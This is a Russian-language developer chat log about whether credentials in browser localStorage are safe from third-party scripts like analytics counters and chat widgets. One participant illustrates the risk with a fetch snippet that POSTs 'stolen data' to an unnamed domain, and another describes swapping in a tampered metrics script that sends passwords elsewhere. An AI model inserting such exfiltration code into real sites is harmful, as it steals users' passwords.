T
не понял
я воспринял то, что было сказано вами, как: "доступы к лс могут получить из другого сайта, когда будет переход"
Size: a a a
2021 March 20
T
Любой JavaScript-код на странице имеет доступ к хранилищу
к чему это было?
m
к чему это было?
ну например вы ставите какой то плагин, аля счетчика или скажем онлайн чат оникон\живосайт и тд, ну мало ли что еще. по факту получается, что яндекс, оникон или живосайт имеют доступ к паролям.
T
ну например вы ставите какой то плагин, аля счетчика или скажем онлайн чат оникон\живосайт и тд, ну мало ли что еще. по факту получается, что яндекс, оникон или живосайт имеют доступ к паролям.
верно, но npm разве не отслеживает передачу данных через плагины?
IT
надо почитать вообще что такое этот токен... (х
Ну токен это шифр от кучи всякого + соль
m
верно, но npm разве не отслеживает передачу данных через плагины?
а почему он должен отслеживать?
T
а почему он должен отслеживать?
не знаю, у меня писало: vulnerabilities 0. Подумал это про защиту
T
Ну токен это шифр от кучи всякого + соль
ясное дело (:
я спрашивал каким образом токен == пароль + имя пользователя на сервере
я спрашивал каким образом токен == пароль + имя пользователя на сервере
T
а почему он должен отслеживать?
наверное, пошла неверная интерпретация (:
имеется в виду не отслеживание httр-запросов, а код типа: fetch(domain, {
method: "post",
body: украденные данные
})
имеется в виду не отслеживание httр-запросов, а код типа: fetch(domain, {
method: "post",
body: украденные данные
})
m
я про плагины которые размещаются прямо в html как например код счетчиков метрики
m
далее например можно на хабе подменить крипт метрики с вкраплением своего, отправляющего пароли куда нужно
m
я не говорю что него нужно использовать, просто вопрос для чего
V
ну или к ип адресу
Нельзя
V
Тебе роутер дает свой локальный адрес, а в интернет всегда смотрит 1 единственным
N
Ерунда какая) Конечно, локалсторадж стоит использовать для определённых задач
IT
Нельзя
Ты в плане про нукст?
V
Т.е если ты залогиниться с компа ты автоматом залогинишься и со всех остальных устройств роутера
m
Ерунда какая) Конечно, локалсторадж стоит использовать для определённых задач
там просто затронут вопрос безопасности